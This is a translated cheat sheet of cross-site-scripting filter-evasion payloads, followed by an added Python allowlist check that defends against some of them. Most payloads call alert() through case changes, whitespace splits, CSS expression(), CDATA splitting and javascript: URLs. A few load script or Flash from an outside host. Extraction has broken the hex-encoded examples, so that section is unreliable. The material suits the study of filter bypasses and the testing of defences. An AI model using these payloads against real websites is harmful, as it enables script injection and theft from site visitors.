1. Change the letter case

<sCript>alert('d')</scRipT>
2. Add extra characters to evade regular-expression checks.

<<script>alert('c')//<</script>

<SCRIPT a=">" SRC="t.js"></SCRIPT>

<SCRIPT =">" SRC="t.js"></SCRIPT>

<SCRIPT a=">" '' SRC="t.js"></SCRIPT>

<SCRIPT "a='>'" SRC="t.js"></SCRIPT>

<SCRIPT a=`>` SRC="t.js"></SCRIPT>

<SCRIPT a=">'>" SRC="t.js"></SCRIPT>
3. Replace the .js extension with another extension

<script src="bad.jpg"></script>
4. Put the JavaScript in a CSS file

<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">

example:

body {
  background-image: url('javascript:alert("XSS");')
}
5. Insert other characters inside the script tag

<SCRIPT/SRC="t.js"></SCRIPT>

<SCRIPT/anyword SRC="t.js"></SCRIPT>
6. Use a tab or a newline to evade

<img src="jav ascr ipt:alert('XSS3')">

<img src="jav ascr ipt:alert('XSS3')">

<IMG SRC="jav ascript:alert('XSS');">

-> tab
-> new line

(The whitespace inside "javascript:" is a tab in one payload and a newline in the other, as the two annotations indicate; extraction has collapsed both to plain spaces.)
7. Use "\" to evade

<STYLE>@im\port'\ja\vasc\ript:alert("XSS32")';</STYLE>

<IMG STYLE='xss:expre\ssion(alert("XSS33"))'>

<IMG STYLE="xss:expr/*anyword*/ession(alert('sss'))">

<DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

<A STYLE='no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
8. Use hex encoding to evade (the ";" may also be dropped)

<DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

Source: <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">

Source: <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">

(The hex-encoded form of each payload appears to have been decoded during extraction, so it is shown here identical to its source.)
9. Script in an HTML tag event handler

<body onload="alert('onload')">

Event handler attributes that accept script:
onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload

10. XSS code inside an SWF file

<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
11. Use CDATA to split the XSS code and let the browser reassemble it.

<XML ID=I><X><C>
<![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
</C></X>
</xml>

<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>
<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
12. Use HTML+TIME.

<HTML><BODY>
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
<?import namespace="t" implementation="#default#time2">
<t:set attributeName="innerHTML" to="anyword<SCRIPT DEFER>alert("XSS")</SCRIPT>">
</BODY></HTML>
13. Set a cookie via META.

<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
14. javascript: in src, href and url()

<IFRAME SRC=javascript:alert('13')></IFRAME>

<img src="javascript:alert('XSS3')">

<IMG DYNSRC="javascript:alert('XSS20')">

<IMG LOWSRC="javascript:alert('XSS21')">

<LINK REL="stylesheet" HREF="javascript:alert('XSS24');">

<IFRAME SRC=javascript:alert('XSS27')></IFRAME>

<TABLE BACKGROUND="javascript:alert('XSS29')">

<DIV STYLE="background-image: url(javascript:alert('XSS30'))">

<STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS35')");}</STYLE><A CLASS=XSS></A>

<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
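As an added defender-side example (not part of the original post), here is a Python check for URL-valued attributes that covers items 1, 6, 8 and 14 above: it normalizes the value the way a browser does (entity decoding, stripping, removal of embedded tab/LF/CR) and then allowlists the scheme, so the case-changed, tab/newline and hex-entity forms all collapse to the same javascript: URL and are rejected. The function and constant names are my own.

```python
import html
import re

# Added example, not from the original post: an allowlist check on the
# scheme of a URL-valued attribute (src, href, url(...)). Names are mine.
ALLOWED_SCHEMES = {"http", "https", "mailto", ""}   # "" means a relative URL
C0_AND_SPACE = "".join(map(chr, range(0x21)))      # U+0000..U+0020

def normalize_url(value: str) -> str:
    """Apply the normalization a browser applies before it resolves a URL:
    decode HTML character references (the HTML parser decodes attribute
    values first, so &#x09; or &#106; become the real character), strip
    leading/trailing C0 controls and spaces, and delete every embedded tab,
    LF and CR, which is what the WHATWG URL parser does."""
    decoded = html.unescape(value)
    stripped = decoded.strip(C0_AND_SPACE)
    return re.sub(r"[\t\n\r]", "", stripped)

def url_scheme(value: str) -> str:
    """Return the lower-cased scheme of the normalized value, or "" when
    there is none (a relative URL)."""
    match = re.match(r"([A-Za-z][A-Za-z0-9+.\-]*):", normalize_url(value))
    return match.group(1).lower() if match else ""

def is_safe_url(value: str) -> bool:
    """Allowlist: accept only the schemes we expect and reject everything
    else (javascript:, vbscript:, data: and any unknown scheme)."""
    return url_scheme(value) in ALLOWED_SCHEMES

def naive_blocklist_allows(value: str) -> bool:
    """The weak check these tricks target: a substring match that copes with
    letter case (item 1) but not with tab/newline or entity forms (items 6, 8)."""
    return "javascript:" not in value.lower()

if __name__ == "__main__":
    # Constructed inputs modelled on items 1, 6, 8 and 14 of the page.
    samples = [
        "JaVaScRiPt:alert('XSS')",          # item 1: letter case
        "jav\tascr\nipt:alert('XSS3')",     # item 6: embedded tab / newline
        "  jav&#x09;ascript:alert('XSS')",  # item 8: hex entity, leading space
        "https://example.com/t.js",         # legitimate absolute URL
        "/static/bad.jpg",                  # legitimate relative URL
    ]
    for s in samples:
        print(f"{s!r:40} naive={naive_blocklist_allows(s)!s:5} "
              f"allowlist={is_safe_url(s)}")
```

The naive check lets the tab/newline form through while the allowlist rejects every javascript: variant and still accepts ordinary absolute and relative URLs.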